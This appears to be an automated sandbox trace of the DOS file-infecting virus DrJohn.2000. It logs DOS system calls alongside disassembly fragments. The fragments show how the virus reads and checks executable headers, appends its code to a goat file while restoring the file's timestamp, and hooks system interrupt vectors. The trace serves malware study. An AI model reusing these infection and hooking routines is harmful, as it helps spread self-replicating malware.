Sample viewer

vx.netlux.org/Virus.DOS.DrJohn.2000

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:56.006197942Z 67 PC: 14317 | Get or set file attributes
2018-12-17T22:56:56.0130477Z 67 PC: 14324 | Get or set file attributes
2018-12-17T22:56:56.361355733Z 61 PC: 14329 | Open file (Filename = '). Size=00001770h/0000006000d bytes. $´ Í!ÃZèõÿ´0Í!<rLè±')
2018-12-17T22:56:56.368620922Z 42 PC: 14332 | Get date
0x14332: mov byte ptr cs:[0x13e], dh
0x14337: mov ax, 0x5700
0x1433a: int 0x21
0x1433c: mov word ptr cs:[0x132], dx
0x14341: mov word ptr cs:[0x134], cx
0x14346: xor cx, cx
0x14348: mov ds, cx
0x1434a: mov ah, 0x78
0x1434c: push cs
0x1434d: pop ds
0x1434e: mov ah, 0x3f
0x14350: mov cx, 0x1a
0x14353: mov dx, 0x658
0x14356: int 0x21
0x14358: mov ax, word ptr cs:[0x658]
0x1435c: cmp ax, 0x4d5a
0x1435f: jne 0x14364
0x14361: jmp 0x14530
0x14364: cmp ax, 0x5a4d
0x14367: jne 0x1436c
2018-12-17T22:56:56.372932749Z 87 PC: 1433c | Get or set file date and time
2018-12-17T22:56:56.376468356Z 63 PC: 14358 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:56:56.382274392Z 66 PC: 1438f | Move file pointer
2018-12-17T22:56:56.384985058Z 63 PC: 1439a | Read file or device (Read 16 bytes on handle 5)
2018-12-17T22:56:56.392850095Z 66 PC: 143ae | Move file pointer
2018-12-17T22:56:56.394925387Z 66 PC: 14402 | Move file pointer
2018-12-17T22:56:56.397446427Z 64 PC: 14417 | Write file or device (Write 1989 bytes on handle 5)
2018-12-17T22:56:56.40914958Z 66 PC: 14425 | Move file pointer
2018-12-17T22:56:56.41124Z 64 PC: 1442f | Write file or device (Write 10 bytes on handle 5)
2018-12-17T22:56:56.415154871Z 67 PC: 14544 | Get or set file attributes
2018-12-17T22:56:56.439635116Z 87 PC: 14553 | Get or set file date and time
2018-12-17T22:56:56.446386208Z 62 PC: 14557 | Close file
2018-12-17T22:56:56.454110972Z 42 PC: 12e2b | Get date
0x12e2b: cli
0x12e2c: cmp byte ptr cs:[0x13e], dh
0x12e31: je 0x12e4b
0x12e33: les cx, ptr [0x24]
0x12e37: mov word ptr cs:[0x1e3], cx
0x12e3c: mov word ptr cs:[0x1e5], es
0x12e41: mov ax, 0x4a8
0x12e44: mov word ptr [0x24], ax
0x12e47: mov word ptr [0x26], cs
0x12e4b: les cx, ptr [0x4c]
0x12e4f: mov word ptr cs:[0x1e7], cx
0x12e54: mov word ptr cs:[0x1e9], es
0x12e59: mov ax, 0x4d2
0x12e5c: mov word ptr [0x4c], ax
0x12e5f: mov word ptr [0x4e], cs
0x12e63: les cx, ptr [0x84]
0x12e67: mov word ptr cs:[0x1eb], cx
0x12e6c: mov word ptr cs:[0x1ed], es
0x12e71: mov ax, 0x1ef
0x12e74: mov word ptr [0x84], ax
2018-12-17T22:56:56.462609971Z 74 PC: 12e85 | Reallocate memory
2018-12-17T22:56:56.465719697Z 73 PC: 12ecb | Release memory
2018-12-17T22:56:56.467538707Z 75 PC: 12ee1 | Execute program
2018-12-17T22:56:56.485195394Z 9 PC: 13496 | Display string (String= 'Goat file (COM/k...). Size=00001770h/0000006000d bytes. ')
2018-12-17T22:56:56.502232595Z 48 PC: 1349f | Get DOS version
2018-12-17T22:56:56.503946998Z 67 PC: 12ba7 | Get or set file attributes
2018-12-17T22:56:56.510712959Z 67 PC: 12bb4 | Get or set file attributes
2018-12-17T22:56:56.527884593Z 61 PC: 12bb9 | Open file (Filename = '')
2018-12-17T22:56:56.537148941Z 42 PC: 12bc2 | Get date
0x12bc2: mov byte ptr cs:[0x13e], dh
0x12bc7: mov ax, 0x5700
0x12bca: int 0x21
0x12bcc: mov word ptr cs:[0x132], dx
0x12bd1: mov word ptr cs:[0x134], cx
0x12bd6: xor cx, cx
0x12bd8: mov ds, cx
0x12bda: mov ah, 0x78
0x12bdc: push cs
0x12bdd: pop ds
0x12bde: mov ah, 0x3f
0x12be0: mov cx, 0x1a
0x12be3: mov dx, 0x658
0x12be6: int 0x21
0x12be8: mov ax, word ptr cs:[0x658]
0x12bec: cmp ax, 0x4d5a
0x12bef: jne 0x12bf4
0x12bf1: jmp 0x12dc0
0x12bf4: cmp ax, 0x5a4d
0x12bf7: jne 0x12bfc
2018-12-17T22:56:56.540670572Z 87 PC: 12bcc | Get or set file date and time
2018-12-17T22:56:56.542802831Z 63 PC: 12be8 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:56:56.546013798Z 66 PC: 12c1f | Move file pointer
2018-12-17T22:56:56.552794957Z 63 PC: 12c2a | Read file or device (Read 16 bytes on handle 5)
2018-12-17T22:56:56.556729675Z 67 PC: 12dd4 | Get or set file attributes
2018-12-17T22:56:56.567545199Z 87 PC: 12de3 | Get or set file date and time
2018-12-17T22:56:56.569451012Z 62 PC: 12de7 | Close file
2018-12-17T22:56:56.578031745Z 61 PC: 1356c | Open file (Filename = '')
2018-12-17T22:56:56.585522659Z 93 PC: 1350e | File sharing functions
2018-12-17T22:56:56.587915497Z 9 PC: 13496 | Display string (String= 'Size change=07D0h/02000d. ')
2018-12-17T22:56:56.593279252Z 76 PC: 134f3 | Terminate with return code (Return code = '1')
2018-12-17T22:56:56.596804169Z 77 PC: 12ee5 | Get program return code
2018-12-17T22:56:56.598448119Z 76 PC: 12ea6 | Terminate with return code (Return code = '0')